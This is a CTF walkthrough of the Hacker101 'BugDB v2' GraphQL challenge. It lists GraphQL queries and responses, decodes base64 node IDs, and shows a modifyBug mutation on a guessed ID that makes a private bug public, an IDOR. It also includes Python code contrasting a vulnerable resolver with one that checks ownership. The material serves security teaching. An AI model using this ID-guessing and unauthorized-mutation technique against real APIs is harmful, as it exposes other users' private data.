
Hacker 101 CTF Walkthrough: BugDB v2

This is the second CTF on Hacker 101 related to GraphQL. Let's dive into it.

Taking the lesson from the previous CTF (BugDB v1), I didn't dive into the introspection query graph straight away this time. Instead I opened the docs of this GraphQL endpoint, which showed that this time we also have a Mutation type, meaning we can post/modify data on the server. Interesting.


Alright, let's follow the trend and read the docs further, under Query.


We can query for a user, find a user or bug, and also list all bugs and all users. Let's carve out a query that fetches most of the data, if not all of it, from the endpoint:


query {
  allUsers {
    edges {
      node {
        id
        username
      }
    }
  }
  allBugs {
    id
    reporter {
      id
      username
    }
    reporterId
    text
    private
  }
}

I queried for all the users and bugs (note: I could also have used the "user" object to query for the users). The response was:

{
  "data": {
    "allUsers": {
      "edges": [
        {
          "node": {
            "id": "VXNlcnM6MQ==",
            "username": "admin"
          }
        },
        {
          "node": {
            "id": "VXNlcnM6Mg==",
            "username": "victim"
          }
        }
      ]
    },
    "allBugs": [
      {
        "id": "QnVnczox",
        "reporter": {
          "id": "VXNlcnM6MQ==",
          "username": "admin"
        },
        "reporterId": 1,
        "text": "This is an example bug",
        "private": false
      }
    ]
  }
}


I copied all the IDs in the response (they are Base64-encoded) and decoded them using https://www.base64decode.org/.


So the users are numbered User:1, User:2 and bugs Bug:1, and so on. Notice one thing: the bug we received in the response has the attribute private set to false, meaning it is marked public, so there is a chance that private bugs exist on this endpoint. What if we can disclose them?

Now let's have a look at the Mutation documentation to see what we can do with it.


OK, so we can modify a bug using this mutation on the GraphQL endpoint, but how can this be a security vulnerability? Here's the catch: as we have seen, there could be private bugs on the server, and if we somehow get their ID we can change their status from private to public, hence disclosing private bugs. Let's convert this theory into action.

We have already seen one bug, so I took a guess that there would be one private bug with ID 2 (after all, hacking involves a lot of guesswork) and tried to set its status to public using the following mutation:

mutation {
  modifyBug(id: 2, private: false) {
    ok
  }
}

This mutation returned ok, which is proof that the bug with ID 2 has been changed from private to public. Let's list all bugs again to check whether we can now see the hidden bug, using:

query {
  allBugs {
    id
    reporter {
      id
      username
    }
    reporterId
    text
    private
  }
}
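To make the root cause concrete, here is an added example (my own code, not the CTF's server or any Hacker101 source) that models the two pieces this walkthrough relies on: the Relay-style node IDs (base64 of "Type:number", as decoded above) and a modifyBug resolver. The vulnerable version checks only that the bug exists, which is exactly the IDOR exploited here; the hardened version enforces object-level authorization against the caller's user ID and filters allBugs the same way. The in-memory data, the owner of the private bug, and the resolver function names are constructed assumptions; note that the real mutation takes the raw integer id, so guessing it never even required decoding a node ID.

```python
import base64
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Relay-style global IDs as seen in the responses: base64("Users:1") == "VXNlcnM6MQ=="
def encode_node_id(type_name: str, number: int) -> str:
    return base64.b64encode(f"{type_name}:{number}".encode()).decode()

def decode_node_id(node_id: str) -> Tuple[str, int]:
    type_name, number = base64.b64decode(node_id).decode().split(":", 1)
    return type_name, int(number)

@dataclass
class Bug:
    id: int
    reporter_id: int
    text: str
    private: bool

class AuthorizationError(Exception):
    """Raised by the hardened resolver when the caller may not touch the bug."""

# Constructed sample data (assumption): the public bug from the response plus the
# private bug with id 2 that the walkthrough guessed; its reporter (user 2) is assumed.
def sample_bugs() -> Dict[int, Bug]:
    return {
        1: Bug(1, 1, "This is an example bug", False),
        2: Bug(2, 2, "constructed private bug", True),
    }

def modify_bug_vulnerable(bugs: Dict[int, Bug], bug_id: int, private: bool) -> dict:
    """IDOR: any caller can flip any bug's visibility; only existence is checked."""
    bug = bugs.get(bug_id)
    if bug is None:
        return {"ok": False}
    bug.private = private
    return {"ok": True}

def modify_bug_secure(bugs: Dict[int, Bug], bug_id: int, private: bool,
                      caller_user_id: int) -> dict:
    """Object-level authorization: only the bug's reporter may change it."""
    bug = bugs.get(bug_id)
    # One error for both "no such bug" and "not yours", so the mutation cannot be
    # used as an oracle to confirm which ids exist.
    if bug is None or bug.reporter_id != caller_user_id:
        raise AuthorizationError("bug not found or not owned by caller")
    bug.private = private
    return {"ok": True}

def all_bugs_visible_to(bugs: Dict[int, Bug], caller_user_id: int) -> List[Bug]:
    """allBugs as a hardened resolver should serve it: private bugs only to their reporter."""
    return [b for b in bugs.values()
            if not b.private or b.reporter_id == caller_user_id]

def demo() -> dict:
    """Run user 1 (the walkthrough's attacker) against both resolvers."""
    results = {}
    bugs = sample_bugs()
    results["vuln_flip"] = modify_bug_vulnerable(bugs, 2, False)["ok"]
    results["vuln_visible"] = [b.id for b in all_bugs_visible_to(bugs, 1)]
    bugs = sample_bugs()
    try:
        modify_bug_secure(bugs, 2, False, caller_user_id=1)
        results["secure_flip"] = True
    except AuthorizationError:
        results["secure_flip"] = False
    results["secure_visible"] = [b.id for b in all_bugs_visible_to(bugs, 1)]
    # The legitimate owner (user 2) can still publish their own bug.
    results["owner_flip"] = modify_bug_secure(bugs, 2, False, caller_user_id=2)["ok"]
    return results

if __name__ == "__main__":
    print(decode_node_id("VXNlcnM6MQ=="), decode_node_id("QnVnczox"))
    print(demo())
```

Running it shows user 1 flipping bug 2 and then seeing it in allBugs against the vulnerable resolver, while the hardened resolver refuses the change and keeps bug 2 out of the listing; the authorization check, not ID obscurity, is what closes the IDOR.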


This CTF involved an IDOR through which we disclosed private bugs. Happy learning!
